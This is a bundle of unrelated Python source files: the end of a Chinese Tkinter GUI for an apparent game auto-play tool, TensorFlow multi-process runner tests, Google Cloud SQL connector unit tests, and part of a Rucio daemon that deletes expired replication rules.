img = Label(when_click_start, image=render)
img.image = render
img.pack()
elif var == '司机':
title = Label(when_click_start)
title['text'] = '\n【 司机模式 】'
title.pack()
desc = Message(when_click_start)
desc['text'] = '\n建议对乘客发出默认邀请,回到组队界面再点START\n' + \
'因为自动发出邀请这个功能没写...不服憋着\n_(:3」∠)_\n'
desc['width'] = 300
desc.pack()
ipath = self.resource_path('image/driver_invite.png')
load = PLI_Image.open(ipath)
load = load.resize(tuple(map(lambda x: int(x * 0.5), load.size)))
render = ImageTk.PhotoImage(load)
img1 = Label(when_click_start, image=render)
img1.image = render
img1.pack()
ipath = self.resource_path('image/driver_form.png')
load = PLI_Image.open(ipath)
load = load.resize(tuple(map(lambda x: int(x * 0.5), load.size)))
render = ImageTk.PhotoImage(load)
img2 = Label(when_click_start, image=render)
img2.image = render
img2.pack()
self.init_window_place(when_click_start, 1.3, 3)
def what_is_clear_time(self):
what_is_clear = Toplevel(self)
what_is_clear.title('平均通关时间说明')
title = Label(what_is_clear)
title['text'] = '\n【 平均通关时间 】'
title.pack()
desc = Message(what_is_clear)
desc['text'] = '\n平均通关时间是指在游戏中,从按下开始战斗到进入结算奖励界面所经过的时间(秒)\n' + \
'\n程序会在经过指定的时间后,再开始检测游戏画面是否进入了结算界面\n' + \
'\n如果设置一个较短的时间也可以,不过设置一个合理的时间,能节省你CPU资源\n(其实也没占多少_(:3」∠)_\n'
desc['width'] = 300
desc.pack()
self.init_window_place(what_is_clear, 1.3, 3)
def create_main(self):
self.label_scaling['text'] = '缩放倍率'
self.var_scaling.set(self.scaling)
self.entry_scaling['textvariable'] = self.var_scaling
self.label_scaling.grid(row=0, column=0, sticky='E')
self.entry_scaling.grid(row=0, column=1, sticky='W', columnspan=2)
self.button_scaling_explain['text'] = '?'
self.button_scaling_explain['command'] = self.what_is_scaling_window
self.button_scaling_explain['relief'] = 'flat'
self.button_scaling_explain.grid(row=0, column=2, sticky='E')
self.label_mode['text'] = '模式'
self.var_mode.set('单刷')
self.listbox_mode['textvariable'] = self.var_mode
self.listbox_mode['width'] = 10
self.listbox_mode['values'] = ["单刷", "乘客", "司机"]
self.listbox_mode.bind("<<ComboboxSelected>>", self.turn_radio_on)
self.label_mode.grid(row=1, column=0, sticky='E')
self.listbox_mode.grid(row=1, column=1, sticky='W')
self.button_mode_explain['text'] = '?'
self.button_mode_explain['command'] = self.when_click_start_window
self.button_mode_explain['relief'] = 'flat'
self.button_mode_explain.grid(row=1, column=2, sticky='W')
self.var_member.set(2)
self.label_member['text'] = '车队人数'
self.label_member.grid(row=2, column=0, sticky='E')
self.radio1['text'] = '2人'
self.radio1['variable'] = self.var_member
self.radio1['value'] = 2
# self.radio1['command'] = self.test_val3
self.radio1.grid(row=2, column=1, sticky='W')
self.radio1.configure(state='disabled')
self.radio2['text'] = '3人'
self.radio2['variable'] = self.var_member
self.radio2['value'] = 3
# self.radio2['command'] = self.test_val3
self.radio2.grid(row=2, column=2, sticky='W')
self.radio2.configure(state='disabled')
self.label_clear_time['text'] = '平均通关时间'
self.var_clear_time.set(self.clear_time)
self.entry_clear_time['textvariable'] = self.var_clear_time
self.label_clear_time.grid(row=3, column=0, sticky='E')
self.entry_clear_time.grid(row=3, column=1, sticky='W', columnspan=2)
self.button_clear_time_explain['text'] = '?'
self.button_clear_time_explain['command'] = self.what_is_clear_time
self.button_clear_time_explain['relief'] = 'flat'
self.button_clear_time_explain.grid(row=3, column=2, sticky='E')
self.label_offer['text'] = '好友发来悬赏'
self.var_offer_mode.set('接受')
self.listbox_offer_mode['textvariable'] = self.var_offer_mode
self.listbox_offer_mode['width'] = 10
self.listbox_offer_mode['values'] = ["接受", "拒绝"]
self.listbox_offer_mode.bind("<<ComboboxSelected>>", self.turn_radio_on)
self.label_offer.grid(row=4, column=0, sticky='E')
self.listbox_offer_mode.grid(row=4, column=1, sticky='W')
self.label_timing_mode['text'] = '预定结束'
self.var_timing_mode.set('无')
self.listbox_timing_mode['textvariable'] = self.var_timing_mode
self.listbox_timing_mode['width'] = 10
self.listbox_timing_mode['values'] = ["无", "定时[分钟]", "场数"]
self.listbox_timing_mode.bind("<<ComboboxSelected>>", self.turn_entry_on)
self.label_timing_mode.grid(row=5, column=0, sticky='E')
self.listbox_timing_mode.grid(row=5, column=1, sticky='W')
self.var_timing_value.set('')
self.entry_timing_value['textvariable'] = self.var_timing_value
self.entry_timing_value['width'] = 5
self.entry_timing_value.configure(state='disabled')
self.entry_timing_value.grid(row=5, column=2, sticky='W')
self.start_ctn['text'] = 'START'
self.start_ctn['width'] = 10
self.start_ctn['height'] = 2
self.start_ctn['command'] = self.fight_start
self.start_ctn['relief'] = 'groove'
self.start_ctn.grid(row=0, column=0, sticky='E')
self.stop_ctn['text'] = 'STOP'
self.stop_ctn['width'] = 10
self.stop_ctn['height'] = 2
self.stop_ctn['command'] = self.fight_stop
self.stop_ctn['relief'] = 'groove'
self.stop_ctn.grid(row=0, column=1, sticky='W')
self.stop_ctn.configure(state='disabled')
self.info_box['width'] = 40
self.info_box['height'] = 20
self.info_box.grid(row=1, column=0, columnspan=2)
self.info_box.see(END)
var = '请授予此程序管理员权限运行,否则在游戏窗口内鼠标无法被控制'
self.info_box.mark_set('insert', END)
self.info_box.insert('insert', str(var) + '\n')
self.info_box.see(END)
app = Application()
# 隐藏console窗口
try:
test = sys.argv[1]
except IndexError:
test = False
if test == 'test':
pass
else:
whnd = windll.kernel32.GetConsoleWindow()
if whnd:
windll.user32.ShowWindow(whnd, 0)
windll.kernel32.CloseHandle(whnd)
app.master.title('就你破势多')
app.init_window_place(app.master, 1.1, 4)
app.mainloop()
|
multi_process_runner_test.py
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `multi_process_runner`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import ctypes
import json
import os
import sys
import threading
import time
import unittest
from absl import logging
from absl.testing import parameterized
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.eager import context
from tensorflow.python.eager import test
def fn_that_adds_task_type_in_return_data():
return multi_worker_test_base.get_task_type()
def fn_that_errors():
raise ValueError('This is an error.')
def fn_that_does_nothing():
pass
def fn_that_adds_simple_return_data():
return 'dummy_data'
def fn_that_returns_args_and_kwargs(*args, **kwargs):
return list(args) + list(kwargs.items())
def fn_with_barrier():
return multi_process_runner.get_barrier()
def fn_that_returns_pid():
return os.getpid()
V = None
def fn_that_sets_global(val):
global V
old_val = V
V = val
return old_val
@combinations.generate(combinations.combine(required_gpus=0))
class MultiProcessRunnerTest(test.TestCase, parameterized.TestCase):
def _worker_idx(self):
config_task = json.loads(os.environ['TF_CONFIG'])['task']
return config_task['index']
def test_multi_process_runner(self):
mpr_result = multi_process_runner.run(
fn_that_adds_task_type_in_return_data,
multi_worker_test_base.create_cluster_spec(
num_workers=2, num_ps=3, has_chief=True))
job_count_dict = {'worker': 2, 'ps': 3, 'chief': 1}
for data in mpr_result.return_value:
job_count_dict[data] -= 1
self.assertEqual(job_count_dict['worker'], 0)
self.assertEqual(job_count_dict['ps'], 0)
self.assertEqual(job_count_dict['chief'], 0)
def test_multi_process_runner_error_propagates_from_subprocesses(self):
runner = multi_process_runner.MultiProcessRunner(
fn_that_errors,
multi_worker_test_base.create_cluster_spec(num_workers=1, num_ps=1),
max_run_time=20)
runner.start()
with self.assertRaisesRegex(ValueError, 'This is an error.'):
runner.join()
def test_multi_process_runner_queue_emptied_between_runs(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
return_value = multi_process_runner.run(fn_that_adds_simple_return_data,
cluster_spec).return_value
self.assertTrue(return_value)
self.assertEqual(return_value[0], 'dummy_data')
self.assertEqual(return_value[1], 'dummy_data')
return_value = multi_process_runner.run(fn_that_does_nothing,
cluster_spec).return_value
self.assertFalse(return_value)
def test_multi_process_runner_args_passed_correctly(self):
return_value = multi_process_runner.run(
fn_that_returns_args_and_kwargs,
multi_worker_test_base.create_cluster_spec(num_workers=1),
args=('a', 'b'),
kwargs={
'c_k': 'c_v'
}).return_value
self.assertEqual(return_value[0][0], 'a')
self.assertEqual(return_value[0][1], 'b')
self.assertEqual(return_value[0][2], ('c_k', 'c_v'))
def test_stdout_captured(self):
def simple_print_func():
print('This is something printed.', flush=True)
return 'This is returned data.'
mpr_result = multi_process_runner.run(
simple_print_func,
multi_worker_test_base.create_cluster_spec(num_workers=2),
return_output=True)
std_stream_results = mpr_result.stdout
return_value = mpr_result.return_value
self.assertIn('[worker-0]: This is something printed.\n',
std_stream_results)
self.assertIn('[worker-1]: This is something printed.\n',
std_stream_results)
self.assertIn('This is returned data.', return_value)
def test_termination(self):
def fn():
for i in range(0, 10):
print(
'index {}, iteration {}'.format(self._worker_idx(), i), flush=True)
time.sleep(5)
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(num_workers=2),
return_output=True)
mpr.start()
time.sleep(5)
mpr.terminate('worker', 0)
std_stream_results = mpr.join().stdout
# Worker 0 is terminated in the middle, so it should not have iteration 9
# printed.
self.assertIn('[worker-0]: index 0, iteration 0\n', std_stream_results)
self.assertNotIn('[worker-0]: index 0, iteration 9\n',
std_stream_results)
self.assertIn('[worker-1]: index 1, iteration 0\n', std_stream_results)
self.assertIn('[worker-1]: index 1, iteration 9\n', std_stream_results)
def test_termination_and_start_single_process(self):
def fn():
for i in range(0, 10):
print(
'index {}, iteration {}'.format(self._worker_idx(), i), flush=True)
time.sleep(1)
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(num_workers=2),
return_output=True)
mpr.start()
time.sleep(3)
mpr.terminate('worker', 0)
mpr.start_single_process('worker', 0)
std_stream_results = mpr.join().stdout
# Worker 0 is terminated in the middle, but a new worker 0 is added, so it
# should still have iteration 9 printed. Moreover, iteration 0 of worker 0
# should happen twice.
self.assertLen(
[s for s in std_stream_results if 'index 0, iteration 0' in s], 2)
self.assertIn('[worker-0]: index 0, iteration 9\n', std_stream_results)
self.assertIn('[worker-1]: index 1, iteration 0\n', std_stream_results)
self.assertIn('[worker-1]: index 1, iteration 9\n', std_stream_results)
def test_streaming(self):
def fn():
for i in range(5):
logging.info('(logging) %s-%d, i: %d',
multi_worker_test_base.get_task_type(), self._worker_idx(),
i)
print(
'(print) {}-{}, i: {}'.format(
multi_worker_test_base.get_task_type(), self._worker_idx(), i),
flush=True)
time.sleep(1)
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=2, num_ps=2),
return_output=True)
mpr._dependence_on_chief = False
mpr.start()
mpr.start_single_process('worker', 2)
mpr.start_single_process('ps', 2)
mpr_result = mpr.join()
list_to_assert = mpr_result.stdout
for job in ['chief']:
for iteration in range(5):
self.assertTrue(
any('(logging) {}-0, i: {}'.format(job, iteration) in line
for line in list_to_assert))
self.assertTrue(
any('(print) {}-0, i: {}'.format(job, iteration) in line
for line in list_to_assert))
for job in ['worker', 'ps']:
for iteration in range(5):
for task in range(3):
self.assertTrue(
any('(logging) {}-{}, i: {}'.format(job, task, iteration) in line
for line in list_to_assert))
self.assertTrue(
any('(print) {}-{}, i: {}'.format(job, task, iteration) in line
for line in list_to_assert))
task = 3
self.assertFalse(
any('(logging) {}-{}, i: {}'.format(job, task, iteration) in line
for line in list_to_assert))
self.assertFalse(
any('(print) {}-{}, i: {}'.format(job, task, iteration) in line
for line in list_to_assert))
def test_start_in_process_as(self):
def fn():
for i in range(5):
logging.info('%s-%d, i: %d', multi_worker_test_base.get_task_type(),
self._worker_idx(), i)
time.sleep(1)
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1),
return_output=True)
def eval_func():
time.sleep(1)
mpr.start_single_process(task_type='evaluator', task_id=0)
eval_thread = threading.Thread(target=eval_func)
eval_thread.start()
mpr.start_in_process_as(as_task_type='chief', as_task_id=0)
eval_thread.join()
list_to_assert = mpr.join().stdout
for job in ['worker', 'evaluator']:
for iteration in range(5):
self.assertTrue(
any('{}-0, i: {}'.format(job, iteration) in line
for line in list_to_assert))
def test_terminate_all_does_not_ignore_error(self):
mpr = multi_process_runner.MultiProcessRunner(
fn_that_errors,
multi_worker_test_base.create_cluster_spec(num_workers=2),
return_output=True)
mpr.start()
time.sleep(60)
mpr.terminate_all()
with self.assertRaisesRegex(ValueError, 'This is an error.'):
mpr.join()
def test_barrier(self):
multi_process_runner.run(
fn_with_barrier,
cluster_spec=multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1),
)
def test_barrier_called_in_main_process(self):
with self.assertRaises(ValueError):
multi_process_runner.get_barrier()
def test_stdout_available_when_timeout(self):
def fn():
logging.info('something printed')
time.sleep(10000) # Intentionally make the test timeout.
with self.assertRaises(multi_process_runner.SubprocessTimeoutError) as cm:
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(num_workers=1),
return_output=True)
mpr.start()
mpr.join(timeout=60)
mpr.terminate_all()
list_to_assert = cm.exception.mpr_result.stdout
self.assertTrue(
any('something printed' in line for line in list_to_assert))
def test_seg_fault_raises_error(self):
if multi_process_runner.is_oss() or sys.version_info >= (3, 7):
self.skipTest('TODO(b/171004637): Failing in OSS and Python 3.7+')
def fn_expected_to_seg_fault():
ctypes.string_at(0) # Intentionally made seg fault.
with self.assertRaises(
multi_process_runner.UnexpectedSubprocessExitError) as cm:
multi_process_runner.run(
fn_expected_to_seg_fault,
multi_worker_test_base.create_cluster_spec(num_workers=1),
return_output=True)
self.assertIn('Subprocess worker-0 exited with exit code',
str(cm.exception))
list_to_assert = cm.exception.mpr_result.stdout
self.assertTrue(
any('Segmentation fault' in line for line in list_to_assert))
def test_seg_fault_in_chief_raises_error(self):
if multi_process_runner.is_oss() or sys.version_info >= (3, 7):
self.skipTest('TODO(b/171004637): Failing in OSS and Python 3.7+')
def fn_expected_to_seg_fault():
if multi_worker_test_base.get_task_type() == 'worker':
time.sleep(10000)
ctypes.string_at(0) # Intentionally made seg fault.
with self.assertRaises(
multi_process_runner.UnexpectedSubprocessExitError) as cm:
multi_process_runner.run(
fn_expected_to_seg_fault,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1),
return_output=True)
self.assertIn('Subprocess chief-0 exited with exit code',
str(cm.exception))
list_to_assert = cm.exception.mpr_result.stdout
self.assertTrue(
any('Segmentation fault' in line for line in list_to_assert))
def test_exit_code_is_reported_by_chief_subprocess(self):
def fn_expected_to_exit_with_20():
if multi_worker_test_base.get_task_type() == 'worker':
time.sleep(10000)
sys.exit(20)
mpr = multi_process_runner.MultiProcessRunner(
fn_expected_to_exit_with_20,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1))
mpr.start()
with self.assertRaisesRegex(
multi_process_runner.UnexpectedSubprocessExitError,
'Subprocess chief-0 exited with exit code 20'):
mpr.join()
def test_exit_code_is_reported_by_subprocess(self):
def fn_expected_to_exit_with_10():
sys.exit(10)
mpr = multi_process_runner.MultiProcessRunner(
fn_expected_to_exit_with_10,
multi_worker_test_base.create_cluster_spec(num_workers=1))
mpr.start()
with self.assertRaisesRegex(
multi_process_runner.UnexpectedSubprocessExitError,
'Subprocess worker-0 exited with exit code 10'):
mpr.join()
def test_auto_restart(self):
def fn(counter):
counter.value += 1
if counter.value == 1:
raise ValueError
manager = multi_process_runner.manager()
counter = manager.Value(int, 0)
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(num_workers=1),
args=(counter,),
auto_restart=True)
mpr.start()
mpr.join()
self.assertEqual(counter.value, 2)
def test_auto_restart_and_timeout(self):
def fn():
logging.info('Running')
time.sleep(1)
raise ValueError
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(num_workers=1),
auto_restart=True,
return_output=True)
mpr.start()
with self.assertRaises(ValueError) as cm:
mpr.join(timeout=10)
self.assertGreater(
sum(['Running' in msg for msg in cm.exception.mpr_result.stdout]), 1)
def test_auto_restart_and_chief(self):
# If the chief has exited with zero exit code, auto restart should stop
# restarting other tasks even if they fail.
def fn():
time.sleep(1)
if multi_worker_test_base.get_task_type() != 'chief':
raise ValueError
manager = multi_process_runner.manager()
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1),
auto_restart=True)
mpr.start()
with self.assertRaises(ValueError):
mpr.join(timeout=10)
def test_auto_restart_failure_immediate_after_restart(self):
# Test the case when worker-0 fails immediately after worker-1 restarts.
def fn():
time.sleep(5)
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(
has_chief=False, num_workers=2),
auto_restart=True)
mpr.start()
pid = mpr.get_process_id('worker', 1)
mpr.terminate('worker', 1)
while mpr.get_process_id('worker', 1) == pid:
time.sleep(0.1)
mpr.terminate('worker', 0)
mpr.join(timeout=20)
def test_auto_restart_terminate(self):
# Tasks terminated by the user should also be restarted.
def fn(counter):
counter.value += 1
if counter.value == 1:
time.sleep(100)
manager = multi_process_runner.manager()
counter = manager.Value(int, 0)
mpr = multi_process_runner.MultiProcessRunner(
fn,
multi_worker_test_base.create_cluster_spec(
has_chief=False, num_workers=1),
args=(counter,),
auto_restart=True)
mpr.start()
time.sleep(3)
mpr.terminate('worker', 0)
mpr.join(timeout=20)
self.assertEqual(counter.value, 2)
def test_error_reporting_overrides_timeout_reporting(self):
def fn():
if self._worker_idx() == 1:
time.sleep(10000)
raise ValueError('Worker 0 errored')
mpr = multi_process_runner.MultiProcessRunner(
fn, multi_worker_test_base.create_cluster_spec(num_workers=2))
mpr.start()
with self.assertRaisesRegex(
ValueError,
'Worker 0 errored'):
mpr.join(timeout=20)
def test_process_exists(self):
def fn():
time.sleep(100000)
mpr = multi_process_runner.MultiProcessRunner(
fn, multi_worker_test_base.create_cluster_spec(num_workers=1))
mpr.start()
self.assertTrue(mpr.process_exists('worker', 0))
mpr.terminate('worker', 0)
# Worker 0 should exit at some point, or else the test would time out.
while mpr.process_exists('worker', 0):
time.sleep(1)
def test_timeout_none(self):
if multi_process_runner.is_oss():
self.skipTest('Intentionally skipping longer test in OSS.')
def fn():
time.sleep(250)
raise ValueError('Worker 0 errored')
mpr = multi_process_runner.MultiProcessRunner(
fn, multi_worker_test_base.create_cluster_spec(num_workers=1))
mpr.start()
with self.assertRaisesRegex(ValueError, 'Worker 0 errored'):
mpr.join(timeout=None)
_global_pool = multi_process_runner.MultiProcessPoolRunner(
multi_worker_test_base.create_cluster_spec(num_workers=2))
class MultiProcessPoolRunnerTest(test.TestCase):
def test_same_process_across_runs(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec)
pid = runner.run(fn_that_returns_pid)
for _ in range(3):
self.assertAllEqual(runner.run(fn_that_returns_pid), pid)
def test_exceptions_in_sub_process(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec)
pid = runner.run(fn_that_returns_pid)
with self.assertRaisesRegex(ValueError, 'This is an error.'):
runner.run(fn_that_errors)
self.assertAllEqual(runner.run(fn_that_returns_pid), pid)
def test_tf_config(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec)
result = runner.run(fn_that_adds_task_type_in_return_data)
job_count_dict = {'worker': 2, 'chief': 1}
for data in result:
job_count_dict[data] -= 1
self.assertEqual(job_count_dict['worker'], 0)
self.assertEqual(job_count_dict['chief'], 0)
@unittest.expectedFailure
def test_exception_in_main_process(self):
# When there's an exception in the main process, __del__() is not called.
# This test is to verify MultiProcessPoolRunner can cope with __del__() not
# being called.
cluster_spec = multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(cluster_spec)
runner.run(fn_that_returns_pid)
raise ValueError('failure')
def test_initializer(self):
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
runner = multi_process_runner.MultiProcessPoolRunner(
cluster_spec, initializer=lambda: fn_that_sets_global(1))
result = runner.run(fn_that_sets_global, args=(2,))
self.assertAllEqual(result, [1, 1])
def test_global_pool(self):
_global_pool.run(fn_that_does_nothing)
def test_nested_pool(self):
def fn():
# This runs in sub processes, so they are each using their own
# MultiProcessPoolRunner.
_global_pool.run(fn_that_does_nothing)
_global_pool.run(fn)
@combinations.generate(combinations.combine(required_physical_gpus=2))
class MultiProcessRunnerMultiGPUTest(test.TestCase, parameterized.TestCase):
def test_not_share_gpu(self):
num_gpus = len(context.context().list_physical_devices('GPU'))
if num_gpus != 2 and num_gpus != 4:
self.skipTest('requires 2 or 4 GPUs')
cluster_spec = multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1)
# Verify that CUDA_VISIBLE_DEVICES are different on each worker.
def cuda_visible_devices_fn():
return os.getenv('CUDA_VISIBLE_DEVICES')
runner = multi_process_runner.MultiProcessRunner(
cuda_visible_devices_fn, cluster_spec, share_gpu=False)
runner.start()
result = runner.join()
if num_gpus == 2:
self.assertAllEqual(sorted(result.return_value), ['0', '1'])
else:
self.assertAllEqual(sorted(result.return_value), ['0,2', '1,3'])
# Verify that CUDA_VISIBLE_DEVICES works.
def num_gpus_fn():
return len(context.context().list_physical_devices('GPU'))
runner = multi_process_runner.MultiProcessRunner(
num_gpus_fn, cluster_spec, share_gpu=False)
runner.start()
result = runner.join()
if num_gpus == 2:
self.assertAllEqual(result.return_value, [1, 1])
else:
self.assertAllEqual(result.return_value, [2, 2])
if __name__ == '__main__':
multi_process_runner.test_main()
|
test_instanceconnectionmanager_unit.py
|
""""
Copyright 2019 Google LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
https://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import pytest # noqa F401 Needed to run the tests
from google.cloud.sql.connector.InstanceConnectionManager import (
InstanceConnectionManager,
)
from google.cloud.sql.connector.utils import generate_keys
import asyncio
import os
import threading
import concurrent
import google.auth
import aiohttp
@pytest.fixture
def connect_string():
"""
Retrieves a valid connection string from the environment and
returns it.
"""
try:
connect_string = os.environ["INSTANCE_CONNECTION_NAME"]
except KeyError:
raise KeyError(
"Please set environment variable 'INSTANCE_CONNECTION"
+ "_NAME' to a valid Cloud SQL connection string."
)
return connect_string
@pytest.fixture
def async_loop():
"""
Creates a loop in a background thread and returns it to use for testing.
"""
loop = asyncio.new_event_loop()
thr = threading.Thread(target=loop.run_forever)
thr.start()
yield loop
loop.stop()
thr.join()
def test_InstanceConnectionManager_init(async_loop):
"""
Test to check whether the __init__ method of InstanceConnectionManager
can tell if the connection string that's passed in is formatted correctly.
"""
connect_string = "test-project:test-region:test-instance"
icm = InstanceConnectionManager(connect_string, async_loop)
project_result = icm._project
region_result = icm._region
instance_result = icm._instance
del icm
assert (
project_result == "test-project"
and region_result == "test-region"
and instance_result == "test-instance"
)
# def test_InstanceConnectionManager_wrong_connection_string():
# """
# Test to check whether the __init__() method of InstanceConnectionManager
# can tell if the connection string that's passed in is formatted correctly.
# """
# loop = asyncio.new_event_loop()
# thr = threading.Thread(target=loop.run_forever)
# thr.start()
# icm = None
# with pytest.raises(CloudSQLConnectionError):
# icm = InstanceConnectionManager("test-project:test-region", loop)
# del icm
@pytest.mark.asyncio
async def test_InstanceConnectionManager_get_ephemeral(connect_string):
"""
Test to check whether _get_ephemeral runs without problems given a valid
connection string.
"""
project = connect_string.split(":")[0]
instance = connect_string.split(":")[2]
credentials, project = google.auth.default()
credentials = credentials.with_scopes(
[
"https://www.googleapis.com/auth/sqlservice.admin",
"https://www.googleapis.com/auth/cloud-platform",
]
)
priv, pub_key = generate_keys()
async with aiohttp.ClientSession() as client_session:
result = await InstanceConnectionManager._get_ephemeral(
client_session, credentials, project, instance, pub_key.decode("UTF-8")
)
result = result.split("\n")
assert (
result[0] == "-----BEGIN CERTIFICATE-----"
and result[len(result) - 1] == "-----END CERTIFICATE-----"
)
@pytest.mark.asyncio
async def test_InstanceConnectionManager_get_metadata(connect_string):
"""
Test to check whether _get_ephemeral runs without problems given a valid
connection string.
"""
project = connect_string.split(":")[0]
instance = connect_string.split(":")[2]
credentials, project = google.auth.default()
credentials = credentials.with_scopes(
[
"https://www.googleapis.com/auth/sqlservice.admin",
"https://www.googleapis.com/auth/cloud-platform",
]
)
priv, pub_key = generate_keys()
async with aiohttp.ClientSession() as client_session:
result = await InstanceConnectionManager._get_metadata(
client_session, credentials, project, instance
)
assert result["ip_addresses"] is not None and isinstance(
result["server_ca_cert"], str
)
def test_InstanceConnectionManager_perform_refresh(async_loop, connect_string):
"""
Test to check whether _get_perform works as described given valid
conditions.
"""
icm = InstanceConnectionManager(connect_string, async_loop)
fut = icm._perform_refresh()
del icm
assert isinstance(fut, concurrent.futures.Future)
|
cleaner.py
|
# Copyright 2013-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2013-2016
# - Mario Lassnig <mario.lassnig@cern.ch>, 2013-2015
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013
# - Vincent Garonne <vgaronne@gmail.com>, 2014-2018
"""
Judge-Cleaner is a daemon to clean expired replication rules.
"""
import logging
import os
import socket
import sys
import threading
import time
import traceback
from copy import deepcopy
from datetime import datetime, timedelta
from re import match
from random import randint
from sqlalchemy.exc import DatabaseError
from rucio.common.config import config_get
from rucio.common.exception import DatabaseException, UnsupportedOperation, RuleNotFound
from rucio.core.heartbeat import live, die, sanity_check
from rucio.core.rule import delete_rule, get_expired_rules
from rucio.core.monitor import record_counter
from rucio.db.sqla.util import get_db_time
graceful_stop = threading.Event()
logging.basicConfig(stream=sys.stdout,
level=getattr(logging,
config_get('common', 'loglevel',
raise_exception=False,
default='DEBUG').upper()),
format='%(asctime)s\t%(process)d\t%(levelname)s\t%(message)s')
def rule_cleaner(once=False):
"""
Main loop to check for expired replication rules
"""
hostname = socket.gethostname()
pid = os.getpid()
current_thread = threading.current_thread()
paused_rules = {} # {rule_id: datetime}
# Make an initial heartbeat so that all judge-cleaners have the correct worker number on the next try
live(executable='rucio-judge-cleaner', hostname=hostname, pid=pid, thread=current_thread)
graceful_stop.wait(1)
while not graceful_stop.is_set():
try:
# heartbeat
heartbeat = live(executable='rucio-judge-cleaner', hostname=hostname, pid=pid, thread=current_thread)
start = time.time()
# Refresh paused rules
iter_paused_rules = deepcopy(paused_rules)
for key in iter_paused_rules:
if datetime.utcnow() > paused_rules[key]:
del paused_rules[key]
rules = get_expired_rules(total_workers=heartbeat['nr_threads'] - 1,
worker_number=heartbeat['assign_thread'],
limit=200,
blacklisted_rules=[key for key in paused_rules])
logging.debug('rule_cleaner[%s/%s] index query time %f fetch size is %d' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, time.time() - start, len(rules)))
if not rules and not once:
logging.debug('rule_cleaner[%s/%s] did not get any work (paused_rules=%s)' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, str(len(paused_rules))))
graceful_stop.wait(60)
else:
for rule in rules:
rule_id = rule[0]
rule_expression = rule[1]
logging.info('rule_cleaner[%s/%s]: Deleting rule %s with expression %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id, rule_expression))
if graceful_stop.is_set():
break
try:
start = time.time()
delete_rule(rule_id=rule_id, nowait=True)
logging.debug('rule_cleaner[%s/%s]: deletion of %s took %f' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id, time.time() - start))
except (DatabaseException, DatabaseError, UnsupportedOperation), e:
if match('.*ORA-00054.*', str(e.args[0])):
paused_rules[rule_id] = datetime.utcnow() + timedelta(seconds=randint(600, 2400))
record_counter('rule.judge.exceptions.LocksDetected')
logging.warning('rule_cleaner[%s/%s]: Locks detected for %s' % (heartbeat['assign_thread'], heartbeat['nr_threads'] - 1, rule_id))
elif match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
elif match('.*ORA-03135.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
else:
logging.error(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
except RuleNotFound, e:
pass
except (DatabaseException, DatabaseError), e:
if match('.*QueuePool.*', str(e.args[0])):
logging.warning(traceback.format_exc())
record_counter('rule.judge.exceptions.%s' % e.__class__.__name__)
